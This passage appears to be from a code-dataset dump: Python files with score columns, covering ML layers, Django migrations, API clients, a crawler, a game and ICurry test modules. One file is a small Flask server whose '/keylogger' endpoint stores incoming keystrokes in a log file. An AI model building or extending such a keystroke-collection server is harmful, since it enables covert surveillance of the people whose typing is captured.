        config.update({'k': self.k, 'sort': self.sort})
        return config

    def compute_output_shape(self, input_shape):
        return input_shape[0], self.k, input_shape[2]

    def call(self, inputs):
        # swap last two dimensions since top_k will be applied along the last dimension
        shifted_inputs = tf.transpose(inputs, [0, 2, 1])

        # extract top_k, returns two tensors [values, indices]
        top_k = tf.math.top_k(shifted_inputs, k=self.k, sorted=self.sort)[0]

        # return flattened output
        return tf.transpose(top_k, [0, 2, 1])
| """Keras layer to extract k highest activations from a sequence."""
import tensorflow as tf
class KMaxPooling(tf.keras.layers.Layer):
"""K-max pooling layer that extracts the k-highest activations from a sequence (2nd dimension)."""
def __init__(self, k=1, sort=True, **kwargs):
super().__init__(**kwargs)
self.input_spec = tf.keras.layers.InputSpec(ndim=3)
self.k = k
self.sort = sort
def get_config(self):
super().get_config()
def compute_output_shape(self, input_shape):
return input_shape[0], self.k, input_shape[2]
def call(self, inputs):
# swap last two dimensions since top_k will be applied along the last dimension
shifted_inputs = tf.transpose(inputs, [0, 2, 1])
# extract top_k, returns two tensors [values, indices]
top_k = tf.math.top_k(shifted_inputs, k=self.k, sorted=self.sort)[0]
# return flattened output
return tf.transpose(top_k, [0, 2, 1]) | en | 0.824535 | Keras layer to extract k highest activations from a sequence. K-max pooling layer that extracts the k-highest activations from a sequence (2nd dimension). # swap last two dimensions since top_k will be applied along the last dimension # extract top_k, returns two tensors [values, indices] # return flattened output | 3.549996 | 4 |
iscc_generator/migrations/0004_rights_field.py | iscc/iscc-service-generator | 2 | 6617357 | # Generated by Django 4.0.4 on 2022-04-29 16:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds an optional free-text copyright
    notice ('rights') field to the IsccCode model."""

    dependencies = [
        ("iscc_generator", "0003_nft_fields"),
    ]

    operations = [
        migrations.AddField(
            model_name="iscccode",
            name="rights",
            # Optional field: both blank (forms) and null (database) allowed.
            field=models.CharField(
                blank=True,
                default=None,
                help_text="Copyright notice",
                max_length=1024,
                null=True,
                verbose_name="rights",
            ),
        ),
    ]
| # Generated by Django 4.0.4 on 2022-04-29 16:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds an optional free-text copyright
    notice ('rights') field to the IsccCode model."""

    dependencies = [
        ("iscc_generator", "0003_nft_fields"),
    ]

    operations = [
        migrations.AddField(
            model_name="iscccode",
            name="rights",
            # Optional field: both blank (forms) and null (database) allowed.
            field=models.CharField(
                blank=True,
                default=None,
                help_text="Copyright notice",
                max_length=1024,
                null=True,
                verbose_name="rights",
            ),
        ),
    ]
| en | 0.878096 | # Generated by Django 4.0.4 on 2022-04-29 16:44 | 1.649689 | 2 |
vas/shared/InstallationImages.py | spring-operator/vas-python-api | 0 | 6617358 | <reponame>spring-operator/vas-python-api<filename>vas/shared/InstallationImages.py<gh_stars>0
# vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vas.shared.Deletable import Deletable
from vas.shared.MutableCollection import MutableCollection
from vas.shared.Resource import Resource
class InstallationImages(MutableCollection):
    """A collection of installation images

    :ivar `vas.shared.Security.Security` security: The resource's security
    """

    def __init__(self, client, location, installation_image_class):
        # 'installation-images' is the collection's REST path segment;
        # installation_image_class is the item type used to wrap entries.
        super(InstallationImages, self).__init__(client, location, 'installation-images', installation_image_class)

    def create(self, path, version):
        """Creates an installation image by uploading a file to the server and assigning it a version

        :param str path: The path of the file to upload
        :param str version: The installation image's version
        :rtype: :class:`vas.shared.InstallationImages.InstallationImage`
        :return: The new installation image
        """
        return self._create_multipart(path, {'version': version})
class InstallationImage(Resource, Deletable):
    """A product binary (typically a .zip or .tar.gz file) uploaded to the
    server. Once created, an installation image can be used to create an
    installation on a group.

    :ivar `vas.shared.Installations.Installations` installations: The installations that have been created from the
        installation image
    :ivar `vas.shared.Security.Security` security: The resource's security
    :ivar int size: The installation image's size
    :ivar str version: The installation image's version
    """

    def __init__(self, client, location, installation_class):
        super(InstallationImage, self).__init__(client, location)
        self.__installation_class = installation_class
        # Lazily populated by the ``installations`` property. Initialised here
        # so the property's first read cannot raise AttributeError (the
        # original only assigned it inside reload()).
        self.__installations = None
        self.__size = self._details['size']
        self.__version = self._details['version']

    @property
    def installations(self):
        # Cache the resources created from the 'installation' links.
        self.__installations = self.__installations or self._create_resources_from_links('installation',
            self.__installation_class)
        return self.__installations

    @property
    def size(self):
        return self.__size

    @property
    def version(self):
        return self.__version

    def reload(self):
        """Reloads the installation image's details from the server"""
        super(InstallationImage, self).reload()
        self.__installations = None  # force re-fetch on next property access

    def __str__(self):
        return "<{} version={} size={}>".format(self.__class__.__name__, self.__version, self.__size)
| # vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vas.shared.Deletable import Deletable
from vas.shared.MutableCollection import MutableCollection
from vas.shared.Resource import Resource
class InstallationImages(MutableCollection):
    """The server-side collection of installation images.

    :ivar `vas.shared.Security.Security` security: The resource's security
    """

    def __init__(self, client, location, installation_image_class):
        collection_name = 'installation-images'
        super(InstallationImages, self).__init__(client, location,
                                                 collection_name,
                                                 installation_image_class)

    def create(self, path, version):
        """Upload the file at *path* and register it under *version*.

        :param str path: The path of the file to upload
        :param str version: The installation image's version
        :rtype: :class:`vas.shared.InstallationImages.InstallationImage`
        :return: The new installation image
        """
        form_fields = {'version': version}
        return self._create_multipart(path, form_fields)
class InstallationImage(Resource, Deletable):
    """A product binary (typically a .zip or .tar.gz file) uploaded to the
    server. Once created, an installation image can be used to create an
    installation on a group.

    :ivar `vas.shared.Installations.Installations` installations: The installations that have been created from the
        installation image
    :ivar `vas.shared.Security.Security` security: The resource's security
    :ivar int size: The installation image's size
    :ivar str version: The installation image's version
    """

    def __init__(self, client, location, installation_class):
        super(InstallationImage, self).__init__(client, location)
        self.__installation_class = installation_class
        # Lazily populated by the ``installations`` property. Initialised here
        # so the property's first read cannot raise AttributeError (the
        # original only assigned it inside reload()).
        self.__installations = None
        self.__size = self._details['size']
        self.__version = self._details['version']

    @property
    def installations(self):
        # Cache the resources created from the 'installation' links.
        self.__installations = self.__installations or self._create_resources_from_links('installation',
            self.__installation_class)
        return self.__installations

    @property
    def size(self):
        return self.__size

    @property
    def version(self):
        return self.__version

    def reload(self):
        """Reloads the installation image's details from the server"""
        super(InstallationImage, self).reload()
        self.__installations = None  # force re-fetch on next property access

    def __str__(self):
        return "<{} version={} size={}>".format(self.__class__.__name__, self.__version, self.__size)
src/semantickit/app/lsi_model.py | dhchenx/semantic-kit | 1 | 6617359 | <gh_stars>1-10
import logging
# Configure root logging once at import time so library progress messages show.
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from gensim import corpora
def build_lsi_model(data_path="sentences.txt",stopwords_path="stopwords_english.txt",save_dict_path="model_dict.dict",save_corpus_path="model_corpus.mm"):
    """Tokenise the sentences in *data_path*, drop stop words and words that
    occur only once, then persist the gensim dictionary and bag-of-words
    corpus to *save_dict_path* / *save_corpus_path*."""
    with open(data_path, encoding="utf-8") as fh:
        documents = [line.strip() for line in fh]
    with open(stopwords_path, encoding="utf-8") as fh:
        stoplist = [line.strip() for line in fh]
    # Lower-case, whitespace-tokenise, and filter out stop words.
    texts = [[word for word in document.lower().split() if word not in stoplist]
             for document in documents]
    # Count token frequencies so hapaxes (frequency 1) can be removed.
    from collections import defaultdict
    frequency = defaultdict(int)
    for text in texts:
        for token in text:
            frequency[token] += 1
    texts = [[token for token in text if frequency[token] > 1] for text in texts]
    from pprint import pprint  # pretty-printer
    pprint(texts)
    dictionary = corpora.Dictionary(texts)
    dictionary.save(save_dict_path)  # store the dictionary, for future reference
    print(dictionary)
    print(dictionary.token2id)
    corpus = [dictionary.doc2bow(text) for text in texts]
    corpora.MmCorpus.serialize(save_corpus_path, corpus)  # store to disk, for later use
    print(corpus)
# build_lsi_model()
import logging
# Configure root logging once at import time so library progress messages show.
# (The original first line was fused with extraction junk, '| import logging'.)
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from gensim import corpora
def build_lsi_model(data_path="sentences.txt",stopwords_path="stopwords_english.txt",save_dict_path="model_dict.dict",save_corpus_path="model_corpus.mm"):
    """Tokenise the sentences in *data_path*, drop stop words and words that
    occur only once, then persist the gensim dictionary and bag-of-words
    corpus to *save_dict_path* / *save_corpus_path*."""
    with open(data_path, encoding="utf-8") as fh:
        documents = [line.strip() for line in fh]
    with open(stopwords_path, encoding="utf-8") as fh:
        stoplist = [line.strip() for line in fh]
    # Lower-case, whitespace-tokenise, and filter out stop words.
    texts = [[word for word in document.lower().split() if word not in stoplist]
             for document in documents]
    # Count token frequencies so hapaxes (frequency 1) can be removed.
    from collections import defaultdict
    frequency = defaultdict(int)
    for text in texts:
        for token in text:
            frequency[token] += 1
    texts = [[token for token in text if frequency[token] > 1] for text in texts]
    from pprint import pprint  # pretty-printer
    pprint(texts)
    dictionary = corpora.Dictionary(texts)
    dictionary.save(save_dict_path)  # store the dictionary, for future reference
    print(dictionary)
    print(dictionary.token2id)
    corpus = [dictionary.doc2bow(text) for text in texts]
    corpora.MmCorpus.serialize(save_corpus_path, corpus)  # store to disk, for later use
    print(corpus)
# build_lsi_model()
def_square.py | BjornChrisnach/intro_to_python_UTA_Arlington | 0 | 6617360 | # Write a function that accepts a number as argument and returns
# the square of the number. For example if the number passed to
# the function is 5 then your function should return 25.
# def my_square(input_number):
# square = input_number**2
# return int(square)
def my_square(x):
    """Return the square of ``x`` as an int, e.g. ``my_square(5) == 25``."""
    return int(x ** 2)
# Write a function that accepts a number as argument and returns
# the square of the number. For example if the number passed to
# the function is 5 then your function should return 25.
# def my_square(input_number):
# square = input_number**2
# return int(square)
def my_square(x):
    """Return the square of ``x`` as an int, e.g. ``my_square(5) == 25``."""
    return int(x ** 2)
| en | 0.600839 | # Write a function that accepts a number as argument and returns # the square of the number. For example if the number passed to # the function is 5 then your function should return 25. # def my_square(input_number): # square = input_number**2 # return int(square) | 4.137019 | 4 |
Networks/web_crawler/stephjspider.py | mischiefsleep/Den-Core-2019 | 0 | 6617361 | <filename>Networks/web_crawler/stephjspider.py
#!/usr/bin/python3
# <NAME>
# <EMAIL>
# Simple Web Scraper, gets all links and images from a single webpage.
import requests
from parsel import Selector
import os
import time

start = time.time()
ScanDir = '/tmp/Web_Crawler'
# Create the output directory for the crawl results if it does not exist yet.
if not os.path.exists(ScanDir):
    os.mkdir(ScanDir)
    print("Directory", ScanDir, " created.")
else:
    print("Directory", ScanDir, " already exists!")
# Ask which site to crawl, then fetch it with a plain GET request.
website = input("What site are we crawling? ")
response = requests.get(website)
# "response.text" contains the whole page; parse it with parsel.
selector = Selector(response.text)
# Extract anchor targets (<a href="*">) and image sources (<img src="*">).
href_links = selector.xpath('//a/@href').getall()
image_links = selector.xpath('//img/@src').getall()
# Print the page links, one per line, and save them to a report file.
print('***************************** Web Page Links ************************************')
print(*href_links, sep="\n")
# Context managers close the report files (the original leaked the handles
# returned by open() inside the print() calls).
with open('/tmp/Web_Crawler/Web_links.txt', 'w') as link_file:
    print(*href_links, file=link_file)
print('*****************************************************************')
# Print the image links, one per line, and save them as well.
print('***************************** Image Links ************************************')
print(*image_links, sep="\n")
with open('/tmp/Web_Crawler/Image_links.txt', 'w') as image_file:
    print(*image_links, file=image_file)
print('*****************************************************************')
# Amount of time the spider took to crawl the site.
end = time.time()
print("Time taken in seconds : ", (end-start))
#!/usr/bin/python3
# <NAME>
# <EMAIL>
# Simple Web Scraper, gets all links and images from a single webpage.
import requests
from parsel import Selector
import os
import time
start = time.time()
ScanDir = '/tmp/Web_Crawler'
# Check for directory and create one for output of scan
if not os.path.exists(ScanDir):
os.mkdir(ScanDir)
print("Directory" , ScanDir , " created.")
else:
print("Directory" , ScanDir, " already exists!")
# Get input for website we would like to crawl
website = input("What site are we crawling? ")
# GET request to the site
response = requests.get(website)
## Setup for scraping tool
# "response.txt" contain all web page content
selector = Selector(response.text)
# Extracting href attribute from anchor tag <a href="*">
href_links = selector.xpath('//a/@href').getall()
#Extracting img src attribute from img tag <img src="*">
image_links = selector.xpath('//img/@src').getall()
# Print out the web page links in order, separated by line
print('***************************** Web Page Links ************************************')
print(*href_links, sep = "\n")
print(*href_links, file=open('/tmp/Web_Crawler/Web_links.txt', 'w'))
print('*****************************************************************')
# Print image links from website, separated by line
print('***************************** Image Links ************************************')
print(*image_links, sep = "\n")
print(*image_links, file=open('/tmp/Web_Crawler/Image_links.txt', 'w'))
print('*****************************************************************')
# Amount of time the spider took to crawl the site.
end = time.time()
print("Time taken in seconds : ", (end-start)) | en | 0.827264 | #!/usr/bin/python3 # <NAME> # <EMAIL> # Simple Web Scraper, gets all links and images from a single webpage. # Check for directory and create one for output of scan # Get input for website we would like to crawl # GET request to the site ## Setup for scraping tool # "response.txt" contain all web page content # Extracting href attribute from anchor tag <a href="*"> #Extracting img src attribute from img tag <img src="*"> # Print out the web page links in order, separated by line # Print image links from website, separated by line # Amount of time the spider took to crawl the site. | 3.552307 | 4 |
examples/sts_b_web.py | anwar1103/semantic-text-similarit | 167 | 6617362 | <filename>examples/sts_b_web.py<gh_stars>100-1000
from semantic_text_similarity.models import WebBertSimilarity
from semantic_text_similarity.data import load_sts_b_data
from scipy.stats import pearsonr

# Evaluate the pretrained web-BERT similarity model on the STS-B dev split.
train, dev, test = load_sts_b_data()
model = WebBertSimilarity()
predictions = model.predict(dev)
# Report the Pearson correlation between gold similarity scores and predictions.
print(pearsonr([instance["similarity"] for instance in dev], predictions))
| <filename>examples/sts_b_web.py<gh_stars>100-1000
from semantic_text_similarity.models import WebBertSimilarity
from semantic_text_similarity.data import load_sts_b_data
from scipy.stats import pearsonr

# Evaluate the pretrained web-BERT similarity model on the STS-B dev split.
train, dev, test = load_sts_b_data()
model = WebBertSimilarity()
predictions = model.predict(dev)
# Report the Pearson correlation between gold similarity scores and predictions.
print(pearsonr([instance["similarity"] for instance in dev], predictions))
| none | 1 | 2.246262 | 2 | |
tia/db_curators/_exmpl_h5fileRW.py | jmakov/market_tia | 1 | 6617363 | from tables import *
class struct(IsDescription):
    """PyTables row description for the ticker table: one float64 column."""
    priceAvg = Float64Col()
#writing
filename = "db/asd.h5"
# Blosc compression at max level; shuffle improves float compressibility.
fl = Filters(complevel=9, complib='blosc', shuffle=1) #enable compression #from http://pytables.github.com/usersguide/libref/helper_classes.html#tables.Filters.complevel
h5file = openFile(filename, mode="w", title="Mt.GoxMarketDB", filters= fl)#, filters=fl)
group = h5file.createGroup("/", 'MtGox', 'Mt.Gox')
table = h5file.createTable(group, 'ticker', struct, "Readout example") #create table for chans
row_table = table.row
# Append one million rows through the Row buffer, then flush once at the end.
for i in xrange(1000000):
    row_table['priceAvg'] = i
    row_table.append()
table.flush()
h5file.close()
#reading
h5file = openFile(filename, mode="r", filters= fl)
# NOTE(review): `print i` / `xrange` are Python 2 syntax and `openFile` is the
# deprecated pre-3.0 PyTables API — this example does not run under Python 3.
for i in h5file:
    print i
mytable = h5file.root.MtGox.ticker
for i in mytable.iterrows():
    print i["priceAvg"]
h5file.close()
class struct(IsDescription):
priceAvg = Float64Col()
#writing
filename = "db/asd.h5"
fl = Filters(complevel=9, complib='blosc', shuffle=1) #enable compression #from http://pytables.github.com/usersguide/libref/helper_classes.html#tables.Filters.complevel
h5file = openFile(filename, mode="w", title="Mt.GoxMarketDB", filters= fl)#, filters=fl)
group = h5file.createGroup("/", 'MtGox', 'Mt.Gox')
table = h5file.createTable(group, 'ticker', struct, "Readout example") #create table for chans
row_table = table.row
for i in xrange(1000000):
row_table['priceAvg'] = i
row_table.append()
table.flush()
h5file.close()
#reading
h5file = openFile(filename, mode="r", filters= fl)
for i in h5file:
print i
mytable = h5file.root.MtGox.ticker
for i in mytable.iterrows():
print i["priceAvg"]
h5file.close() | en | 0.336617 | #writing #enable compression #from http://pytables.github.com/usersguide/libref/helper_classes.html#tables.Filters.complevel #, filters=fl) #create table for chans #reading | 2.756556 | 3 |
CYBER_SLAP.py | cyberninjaz/a-lot-of-stuff | 0 | 6617364 | <gh_stars>0
from random import randint
class Player():
    """A combatant with health, energy and a display name."""

    def __init__(self, name):
        # Keep hp/energy as per-instance state; the original declared them as
        # class attributes, which invites accidental shared state.
        self.hp = 1000
        self.energy = 100
        self.name = name

    def isAlive(self):
        """True while the player still has both health and energy left."""
        return self.hp > 0 and self.energy > 0
# Create both players and greet them by name
# (the original printed the literal text 'p1.name' for player 1).
p1 = Player('<NAME>')
print(f'Hi {p1.name}')
p2 = Player('<NAME>')
print(f'Hi {p2.name}')
class Attack():
    """A named move: deals random damage in [mindamage, maxdamage], costs
    energy, and may heal the user's health and/or energy."""

    def __init__(self, name, mnD, mxD, e, hh, eh):
        self.name = name
        self.mindamage = mnD
        self.maxdamage = mxD
        self.energy = e
        self.hpheal = hh
        self.energyheal = eh

    def use(self, user, target):
        # Roll damage against the target, then apply costs/heals to the user.
        damage = randint(self.mindamage, self.maxdamage)
        target.hp -= damage
        user.energy -= self.energy
        user.hp += self.hpheal
        user.energy += self.energyheal
        print('BOOM!!!')

    def printStats(self):
        stats = (f'{self.name}: Damage: {self.mindamage}-{self.maxdamage}, '
                 f'Energy: -{self.energy}, Health Heal: {self.hpheal}, '
                 f'Energy Heal: {self.energyheal}')
        print(stats)
# The six selectable moves: four attacks plus a heal and an energy snack.
dogecoin = Attack(name='Dogecoin', mnD=200, mxD=300, e=30, hh=0, eh=0)
bitcoin = Attack(name='Bitcoin', mnD=200, mxD=200, e=20, hh=0, eh=0)
ethereum = Attack(name='Ethereum', mnD=150, mxD=150, e=10, hh=0, eh=0)
litecoin = Attack(name='Litecoin', mnD=100, mxD=150, e=5, hh=0, eh=0)
medicine = Attack(name='Medicine', mnD=0, mxD=0, e=0, hh=100, eh=0)
food = Attack(name='Food', mnD=0, mxD=0, e=0, hh=0, eh=10)
moves = [dogecoin, bitcoin, ethereum, litecoin, medicine, food]
def options():
    """Print the stat line of every available move."""
    for move in moves:
        move.printStats()
# Main game loop: players alternate moves until someone runs out of hp/energy.
while p1.hp > 0 and p2.hp > 0 and p1.energy > 0 and p2.energy > 0:
    options()
    move = input('Move: ')
    for x in moves:
        if move == x.name:
            x.use(p1, p2)
            break
    print(f'Player 2 health: {p2.hp}')
    print(f'Player 1 energy: {p1.energy}')
    # Stop before player 2's turn if player 1's move already ended the game
    # (the original let a defeated player attack once more).
    if p2.hp <= 0 or p2.energy <= 0 or p1.hp <= 0 or p1.energy <= 0:
        break
    options()
    move = input('Move: ')
    for x in moves:
        if move == x.name:
            x.use(p2, p1)
            break
    print(f'Player 1 health: {p1.hp}')
    print(f'Player 2 energy: {p2.energy}')
# Use <= 0: damage can overshoot below zero, so the original == 0 checks
# frequently matched neither player and printed no winner at all.
if p1.energy <= 0 or p1.hp <= 0:
    print('PLAYER 2 WON!!!')
elif p2.energy <= 0 or p2.hp <= 0:
    print('PLAYER 1 WON!!!')
class Player():
    """A combatant with health, energy and a display name."""

    def __init__(self, name):
        # Keep hp/energy as per-instance state; the original declared them as
        # class attributes, which invites accidental shared state.
        self.hp = 1000
        self.energy = 100
        self.name = name

    def isAlive(self):
        """True while the player still has both health and energy left."""
        return self.hp > 0 and self.energy > 0
# Create both players and greet them by name
# (the original printed the literal text 'p1.name' for player 1).
p1 = Player('<NAME>')
print(f'Hi {p1.name}')
p2 = Player('<NAME>')
print(f'Hi {p2.name}')
class Attack():
    """A named move: deals random damage in [mindamage, maxdamage], costs
    energy, and may heal the user's health and/or energy."""

    def __init__(self, name, mnD, mxD, e, hh, eh):
        self.name = name
        self.mindamage = mnD
        self.maxdamage = mxD
        self.energy = e
        self.hpheal = hh
        self.energyheal = eh

    def use(self, user, target):
        # Roll damage against the target, then apply costs/heals to the user.
        damage = randint(self.mindamage, self.maxdamage)
        target.hp -= damage
        user.energy -= self.energy
        user.hp += self.hpheal
        user.energy += self.energyheal
        print('BOOM!!!')

    def printStats(self):
        stats = (f'{self.name}: Damage: {self.mindamage}-{self.maxdamage}, '
                 f'Energy: -{self.energy}, Health Heal: {self.hpheal}, '
                 f'Energy Heal: {self.energyheal}')
        print(stats)
# The six selectable moves: four attacks plus a heal and an energy snack.
dogecoin = Attack(name='Dogecoin', mnD=200, mxD=300, e=30, hh=0, eh=0)
bitcoin = Attack(name='Bitcoin', mnD=200, mxD=200, e=20, hh=0, eh=0)
ethereum = Attack(name='Ethereum', mnD=150, mxD=150, e=10, hh=0, eh=0)
litecoin = Attack(name='Litecoin', mnD=100, mxD=150, e=5, hh=0, eh=0)
medicine = Attack(name='Medicine', mnD=0, mxD=0, e=0, hh=100, eh=0)
food = Attack(name='Food', mnD=0, mxD=0, e=0, hh=0, eh=10)
moves = [dogecoin, bitcoin, ethereum, litecoin, medicine, food]
def options():
    """Print the stat line of every available move."""
    for move in moves:
        move.printStats()
# Main game loop: players alternate moves until someone runs out of hp/energy.
while p1.hp > 0 and p2.hp > 0 and p1.energy > 0 and p2.energy > 0:
    options()
    move = input('Move: ')
    for x in moves:
        if move == x.name:
            x.use(p1, p2)
            break
    print(f'Player 2 health: {p2.hp}')
    print(f'Player 1 energy: {p1.energy}')
    # Stop before player 2's turn if player 1's move already ended the game
    # (the original let a defeated player attack once more).
    if p2.hp <= 0 or p2.energy <= 0 or p1.hp <= 0 or p1.energy <= 0:
        break
    options()
    move = input('Move: ')
    for x in moves:
        if move == x.name:
            x.use(p2, p1)
            break
    print(f'Player 1 health: {p1.hp}')
    print(f'Player 2 energy: {p2.energy}')
# Use <= 0: damage can overshoot below zero, so the original == 0 checks
# frequently matched neither player and printed no winner at all.
if p1.energy <= 0 or p1.hp <= 0:
    print('PLAYER 2 WON!!!')
elif p2.energy <= 0 or p2.hp <= 0:
    print('PLAYER 1 WON!!!')
net_models/models/__init__.py | mihudec/netcm | 0 | 6617365 | <gh_stars>0
import inspect
from net_models.models.BaseModels import *
from net_models.models.services import *
from net_models.models.interfaces import *
from net_models.models.routing import *

# Registry of every BaseNetModel subclass pulled in by the star imports above,
# keyed by class name.
models_map = {
    name: obj
    for name, obj in dict(globals()).items()
    if inspect.isclass(obj) and issubclass(obj, BaseNetModel)
}
# (The original first and last lines were fused with extraction junk.)
import inspect
from net_models.models.BaseModels import *
from net_models.models.services import *
from net_models.models.interfaces import *
from net_models.models.routing import *

# Registry of every BaseNetModel subclass pulled in by the star imports above,
# keyed by class name.
models_map = {
    name: obj
    for name, obj in dict(globals()).items()
    if inspect.isclass(obj) and issubclass(obj, BaseNetModel)
}
from flask import Flask
from flask import request

app = Flask(__name__)
# Append-mode log sink kept open for the lifetime of the process.
fob = open('log.txt', 'a')

@app.route('/keylogger', methods=['POST'])
def receive_keys():
    """Persist the 'input' field of a JSON POST body to the log file."""
    if request.method == "POST":
        if request.is_json:
            data = request.get_json()
            fob.write(data['input'])
            print(data['input'])
            fob.write('\n')
            # Flush so buffered keystrokes are not lost if the process dies.
            fob.flush()
            return "Ok", 200
    # The original fell through and returned None for non-JSON requests,
    # which makes Flask raise a 500; reject them explicitly instead.
    return "Bad Request", 400

app.run()
from flask import Flask
from flask import request

app = Flask(__name__)
# Append-mode log sink kept open for the lifetime of the process.
fob = open('log.txt', 'a')

@app.route('/keylogger', methods=['POST'])
def receive_keys():
    """Persist the 'input' field of a JSON POST body to the log file."""
    if request.method == "POST":
        if request.is_json:
            data = request.get_json()
            fob.write(data['input'])
            print(data['input'])
            fob.write('\n')
            # Flush so buffered keystrokes are not lost if the process dies.
            fob.flush()
            return "Ok", 200
    # The original fell through and returned None for non-JSON requests,
    # which makes Flask raise a 500; reject them explicitly instead.
    return "Bad Request", 400

app.run()
| none | 1 | 2.709582 | 3 | |
tests/lib/cytest/bootstrap.py | andyjost/Sprite | 1 | 6617367 | '''
Defines in pure ICurry a few simple modules designed for system testing.
'''
from curry.icurry import *
from curry.icurry.json import load
from curry import unboxed
# An arbitrary choice id.
_cid = 527
# The same id wrapped by curry.unboxed for use as an ICurry literal argument
# (presumably marks it as an unboxed literal — TODO confirm against curry docs).
cid = unboxed(_cid)
def blk(expr):
    """Wrap *expr* as the statement of an otherwise-empty IBlock."""
    return IBlock(vardecls=[], assigns=[], stmt=expr)

def retbody(expr):
    """Build a function body that simply returns *expr*."""
    wrapped = IReturn(expr)
    return IFuncBody(blk(wrapped))
def getbootstrap():
    """Build the 'bootstrap' test IModule.

    Declares the data type NUM (constructors N, M, U, B) plus functions that
    exercise constructor calls (ZN), failure (ZF), choices (ZQ), forwarding
    nodes (ZW), and case analysis over NUM (Z).
    """
    return IModule(
        name='bootstrap'
      , imports=['Prelude']
      , types=[
            IType(
                name='bootstrap.NUM'
              , constructors=[
                    IConstructor('bootstrap.N', 0) # Nullary
                  , IConstructor('bootstrap.M', 0) # A distinct nullary, to test choices.
                  , IConstructor('bootstrap.U', 1) # Unary
                  , IConstructor('bootstrap.B', 2) # Binary
                  ]
              )
          ]
      , functions=[
            IFunction('bootstrap.ZN', 0, body=retbody(ICCall('bootstrap.N')))
          , IFunction('bootstrap.ZF', 0, body=retbody(ICCall('Prelude._Failure')))
          , IFunction('bootstrap.ZQ', 0, body=retbody(
                ICCall('Prelude._Choice', [_cid, ICCall('bootstrap.N'), ICCall('bootstrap.M')])
            ))
            # ^^^
            # Not correctly typed, but three arguments are needed here.
          , IFunction('bootstrap.ZW', 0, body=retbody(ICCall('Prelude._Fwd', [ICCall('bootstrap.N')])))
            # Evaluates its argument and then returns a FWD node refering to it.
          , IFunction('bootstrap.Z' , 1, body=IFuncBody(IBlock(
                # Bind variable 1 to the function's first argument, then
                # case on its constructor.
                vardecls=[IVarDecl(1)]
              , assigns=[IVarAssign(1, IVarAccess(0, path=[0]))]
              , stmt=ICaseCons(
                    1
                  , branches=[
                        IConsBranch("bootstrap.N", 0, blk(IReturn(IVar(1))))
                      , IConsBranch("bootstrap.M", 0, blk(IReturn(IVar(1))))
                      , IConsBranch("bootstrap.U", 1, blk(IReturn(IFCall("Prelude.failed"))))
                      , IConsBranch("bootstrap.B", 2, blk(IReturn(IFCall("Prelude.failed"))))
                      ]
                  )
            )))
          ]
      )
def getlist():
    """Build the test module 'mylist': a cons/nil list type, no functions."""
    return IModule(
        name='mylist', imports=['Prelude'], functions=[]
      , types=[
            IType(
                name='mylist.List'
              , constructors=[
                    IConstructor('mylist.Cons', 2)  # head and tail
                  , IConstructor('mylist.Nil', 0)   # empty list
                  ]
              )
          ]
      )
def getx():
    """Build the single-constructor test module 'X'."""
    x_constructor = IConstructor('X.X', 1)
    x_type = IType(name='X.X', constructors=[x_constructor])
    return IModule(name='X', imports=['Prelude'], functions=[], types=[x_type])
def getexample():
    """Load the example ICurry module from its JSON file."""
    example_path = 'data/json/example.json'
    return load(example_path)
| '''
Defines in pure ICurry a few simple modules designed for system testing.
'''
from curry.icurry import *
from curry.icurry.json import load
from curry import unboxed
# An arbitrary choice id.
_cid = 527
# The same id wrapped by curry.unboxed for use as an ICurry literal argument
# (presumably marks it as an unboxed literal — TODO confirm against curry docs).
cid = unboxed(_cid)
def blk(expr):
    """Wrap *expr* as the statement of an otherwise-empty IBlock."""
    return IBlock(vardecls=[], assigns=[], stmt=expr)

def retbody(expr):
    """Build a function body that simply returns *expr*."""
    wrapped = IReturn(expr)
    return IFuncBody(blk(wrapped))
def getbootstrap():
    """Build the 'bootstrap' test IModule.

    Declares the data type NUM (constructors N, M, U, B) plus functions that
    exercise constructor calls (ZN), failure (ZF), choices (ZQ), forwarding
    nodes (ZW), and case analysis over NUM (Z).
    """
    return IModule(
        name='bootstrap'
      , imports=['Prelude']
      , types=[
            IType(
                name='bootstrap.NUM'
              , constructors=[
                    IConstructor('bootstrap.N', 0) # Nullary
                  , IConstructor('bootstrap.M', 0) # A distinct nullary, to test choices.
                  , IConstructor('bootstrap.U', 1) # Unary
                  , IConstructor('bootstrap.B', 2) # Binary
                  ]
              )
          ]
      , functions=[
            IFunction('bootstrap.ZN', 0, body=retbody(ICCall('bootstrap.N')))
          , IFunction('bootstrap.ZF', 0, body=retbody(ICCall('Prelude._Failure')))
          , IFunction('bootstrap.ZQ', 0, body=retbody(
                ICCall('Prelude._Choice', [_cid, ICCall('bootstrap.N'), ICCall('bootstrap.M')])
            ))
            # ^^^
            # Not correctly typed, but three arguments are needed here.
          , IFunction('bootstrap.ZW', 0, body=retbody(ICCall('Prelude._Fwd', [ICCall('bootstrap.N')])))
            # Evaluates its argument and then returns a FWD node refering to it.
          , IFunction('bootstrap.Z' , 1, body=IFuncBody(IBlock(
                # Bind variable 1 to the function's first argument, then
                # case on its constructor.
                vardecls=[IVarDecl(1)]
              , assigns=[IVarAssign(1, IVarAccess(0, path=[0]))]
              , stmt=ICaseCons(
                    1
                  , branches=[
                        IConsBranch("bootstrap.N", 0, blk(IReturn(IVar(1))))
                      , IConsBranch("bootstrap.M", 0, blk(IReturn(IVar(1))))
                      , IConsBranch("bootstrap.U", 1, blk(IReturn(IFCall("Prelude.failed"))))
